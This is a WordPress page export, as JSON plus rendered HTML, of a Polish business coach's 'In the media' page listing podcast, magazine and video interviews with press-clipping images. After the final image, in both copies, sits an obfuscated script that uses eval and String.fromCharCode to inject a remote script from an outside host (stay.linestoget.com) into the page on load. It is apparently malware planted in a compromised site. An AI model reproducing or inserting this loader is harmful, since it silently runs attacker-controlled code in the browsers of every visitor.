{"id":26,"date":"2017-02-28T18:42:44","date_gmt":"2017-02-28T17:42:44","guid":{"rendered":"https:\/\/darekniedzieski.wordpress.com\/darek-niedzieski-w-mediach-2\/"},"modified":"2017-02-28T18:42:44","modified_gmt":"2017-02-28T17:42:44","slug":"darek-niedzieski-w-mediach-2","status":"publish","type":"page","link":"https:\/\/darekniedzieski.pl\/index.php\/sklep\/darek-niedzieski-w-mediach-2\/","title":{"rendered":"W mediach"},"content":{"rendered":"<div id=\"res\" class=\"med\">\n<div id=\"search\">\n<div id=\"ires\">\n<div id=\"rso\">\n<div class=\"_NId\">\n<div class=\"srg\">\n<div class=\"g\">\n<div class=\"rc\">\n<div><\/div>\n<div class=\"s\"><strong>Wywiad z Darkiem Niedzieskim na podca\u015bcie Dekompresor<\/strong><\/div>\n<div class=\"s\"><\/div>\n<div class=\"s\">Zapraszam do wys\u0142uchania rozmowy z panem Dariuszem Niedzieskim, coachem, trenerem biznesu, konsultantem, akredytowanym na poziomie PCC cz\u0142onkiem International Coach Federation i Izby Coachingu oraz cz\u0142onkiem Neuroroleadership Institute z siedzib\u0105 w USA. Wyja\u015bniamy, \u017ce coaching jest form\u0105 partnerskiej wsp\u00f3\u0142pracy z klientem, wywo\u0142uj\u0105c\u0105 istotn\u0105 zmian\u0119 sposobu jego my\u015blenia, dzi\u0119ki czemu mo\u017ce on osi\u0105ga\u0107 wyj\u0105tkowe rezultaty w \u017cyciu zawodowym i osobistym.<\/div>\n<div class=\"s\"><\/div>\n<div class=\"s\"><a href=\"http:\/\/dekompresor.pl\/nauka\/neuro-coaching-w-dydaktyce-czyli-jak-mozg-zmienia-mozg\">dekompresor.pl\/nauka\/neuro-coaching-w-dydaktyce-czyli-jak-mozg-zmienia-mozg<\/a><\/div>\n<div class=\"s\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"f kv _SWb\">\n<div class=\"action-menu ab_ctl\">\n<hr \/>\n<\/div>\n<\/div>\n<p><strong>Wywiad dla pisma \u00a0CRN 30 stycznia 2014<\/strong><\/p>\n<p><a href=\"https:\/\/www.crn.pl\/wywiady-i-felietony\/firm-nie-stac-na-brak-szkolen\">Wywiad dla CRN<\/a><\/p>\n<div class=\"prose\">\n<hr \/>\n<p><strong>Wywiad\u00a0przeprowadzony z Darkiem Niedzieski przez Adama Gieniusza dla kana\u0142u Tomasz S\u0142odki Live:<\/strong><\/p>\n<p><a href=\"http:\/\/www.youtube.com\/watch?v=gQS0mmqb3ao&amp;index=4&amp;list=PL9fq9m8rcKsAm_TW1FfvPqmvSCSwgqnvM\" target=\"_blank\" rel=\"noopener\">O m\u00f3zgu, ksi\u0105\u017ckach i coachingu<\/a><\/p>\n<hr \/>\n<\/div>\n<div id=\"floating-share-button\"><\/div>\n<div class=\"article-content-footer\">\u00a0Tygodnik ITD, rok 1984<\/div>\n<div class=\"article-content-footer\"><\/div>\n<div class=\"article-content-footer\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-199\" src=\"https:\/\/darekniedzieski.files.wordpress.com\/2017\/03\/15732116_10208232779879584_3460549422826989776_o.jpg\" alt=\"15732116_10208232779879584_3460549422826989776_o\" width=\"2048\" height=\"962\" srcset=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/15732116_10208232779879584_3460549422826989776_o.jpg 2048w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/15732116_10208232779879584_3460549422826989776_o-416x195.jpg 416w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/15732116_10208232779879584_3460549422826989776_o-300x141.jpg 300w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/15732116_10208232779879584_3460549422826989776_o-768x361.jpg 768w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/15732116_10208232779879584_3460549422826989776_o-1024x481.jpg 1024w\" sizes=\"(max-width: 2048px) 100vw, 2048px\" \/><\/div>\n<div class=\"article-content-footer\">\n<hr \/>\n<\/div>\n<p>Computer Reseller News, rok 2016<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-184\" src=\"https:\/\/darekniedzieski.files.wordpress.com\/2017\/03\/12472555_10208756293335738_81891156043777405_n.jpg?w=225\" alt=\"12472555_10208756293335738_81891156043777405_n\" width=\"225\" height=\"300\" srcset=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/12472555_10208756293335738_81891156043777405_n.jpg 720w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/12472555_10208756293335738_81891156043777405_n-416x555.jpg 416w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/12472555_10208756293335738_81891156043777405_n-225x300.jpg 225w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wywiad z Darkiem Niedzieskim na podca\u015bcie Dekompresor Zapraszam do wys\u0142uchania rozmowy z panem Dariuszem Niedzieskim, coachem, trenerem biznesu, konsultantem, akredytowanym na poziomie PCC cz\u0142onkiem International Coach Federation i Izby Coachingu oraz cz\u0142onkiem Neuroroleadership Institute z siedzib\u0105 w USA. Wyja\u015bniamy, \u017ce coaching jest form\u0105 partnerskiej wsp\u00f3\u0142pracy z klientem, wywo\u0142uj\u0105c\u0105 istotn\u0105 zmian\u0119 sposobu jego my\u015blenia, dzi\u0119ki czemu [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":16,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages\/26"}],"collection":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/comments?post=26"}],"version-history":[{"count":0,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages\/26\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages\/16"}],"wp:attachment":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/media?parent=26"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<div id="res" class="med">
<div id="search">
<div id="ires">
<div id="rso">
<div class="_NId">
<div class="srg">
<div class="g">
<div class="rc">
<div></div>
<div class="s"><strong>Wywiad z Darkiem Niedzieskim na podcaście Dekompresor</strong></div>
<div class="s"></div>
<div class="s">Zapraszam do wysłuchania rozmowy z panem Dariuszem Niedzieskim, coachem, trenerem biznesu, konsultantem, akredytowanym na poziomie PCC członkiem International Coach Federation i Izby Coachingu oraz członkiem Neuroroleadership Institute z siedzibą w USA. Wyjaśniamy, że coaching jest formą partnerskiej współpracy z klientem, wywołującą istotną zmianę sposobu jego myślenia, dzięki czemu może on osiągać wyjątkowe rezultaty w życiu zawodowym i osobistym.</div>
<div class="s"></div>
<div class="s"><a href="http://dekompresor.pl/nauka/neuro-coaching-w-dydaktyce-czyli-jak-mozg-zmienia-mozg">dekompresor.pl/nauka/neuro-coaching-w-dydaktyce-czyli-jak-mozg-zmienia-mozg</a></div>
<div class="s"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="f kv _SWb">
<div class="action-menu ab_ctl">
<hr />
</div>
</div>
<p><strong>Wywiad dla pisma  CRN 30 stycznia 2014</strong></p>
<p><a href="https://www.crn.pl/wywiady-i-felietony/firm-nie-stac-na-brak-szkolen">Wywiad dla CRN</a></p>
<div class="prose">
<hr />
<p><strong>Wywiad przeprowadzony z Darkiem Niedzieski przez Adama Gieniusza dla kanału Tomasz Słodki Live:</strong></p>
<p><a href="http://www.youtube.com/watch?v=gQS0mmqb3ao&amp;index=4&amp;list=PL9fq9m8rcKsAm_TW1FfvPqmvSCSwgqnvM" target="_blank" rel="noopener">O mózgu, książkach i coachingu</a></p>
<hr />
</div>
<div id="floating-share-button"></div>
<div class="article-content-footer"> Tygodnik ITD, rok 1984</div>
<div class="article-content-footer"></div>
<div class="article-content-footer"><img loading="lazy" class="alignnone size-full wp-image-199" src="https://darekniedzieski.files.wordpress.com/2017/03/15732116_10208232779879584_3460549422826989776_o.jpg" alt="15732116_10208232779879584_3460549422826989776_o" width="2048" height="962" srcset="https://darekniedzieski.pl/wp-content/uploads/2017/03/15732116_10208232779879584_3460549422826989776_o.jpg 2048w, https://darekniedzieski.pl/wp-content/uploads/2017/03/15732116_10208232779879584_3460549422826989776_o-416x195.jpg 416w, https://darekniedzieski.pl/wp-content/uploads/2017/03/15732116_10208232779879584_3460549422826989776_o-300x141.jpg 300w, https://darekniedzieski.pl/wp-content/uploads/2017/03/15732116_10208232779879584_3460549422826989776_o-768x361.jpg 768w, https://darekniedzieski.pl/wp-content/uploads/2017/03/15732116_10208232779879584_3460549422826989776_o-1024x481.jpg 1024w" sizes="(max-width: 2048px) 100vw, 2048px" /></div>
<div class="article-content-footer">
<hr />
</div>
<p>Computer Reseller News, rok 2016</p>
<p><img loading="lazy" class="alignnone size-medium wp-image-184" src="https://darekniedzieski.files.wordpress.com/2017/03/12472555_10208756293335738_81891156043777405_n.jpg?w=225" alt="12472555_10208756293335738_81891156043777405_n" width="225" height="300" srcset="https://darekniedzieski.pl/wp-content/uploads/2017/03/12472555_10208756293335738_81891156043777405_n.jpg 720w, https://darekniedzieski.pl/wp-content/uploads/2017/03/12472555_10208756293335738_81891156043777405_n-416x555.jpg 416w, https://darekniedzieski.pl/wp-content/uploads/2017/03/12472555_10208756293335738_81891156043777405_n-225x300.jpg 225w" sizes="(max-width: 225px) 100vw, 225px" /><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script></p>

<p>Wywiad z Darkiem Niedzieskim na podcaście Dekompresor Zapraszam do wysłuchania rozmowy z panem Dariuszem Niedzieskim, coachem, trenerem biznesu, konsultantem, akredytowanym na poziomie PCC członkiem International Coach Federation i Izby Coachingu oraz członkiem Neuroroleadership Institute z siedzibą w USA. Wyjaśniamy, że coaching jest formą partnerskiej współpracy z klientem, wywołującą istotną zmianę sposobu jego myślenia, dzięki czemu [&hellip;]</p>
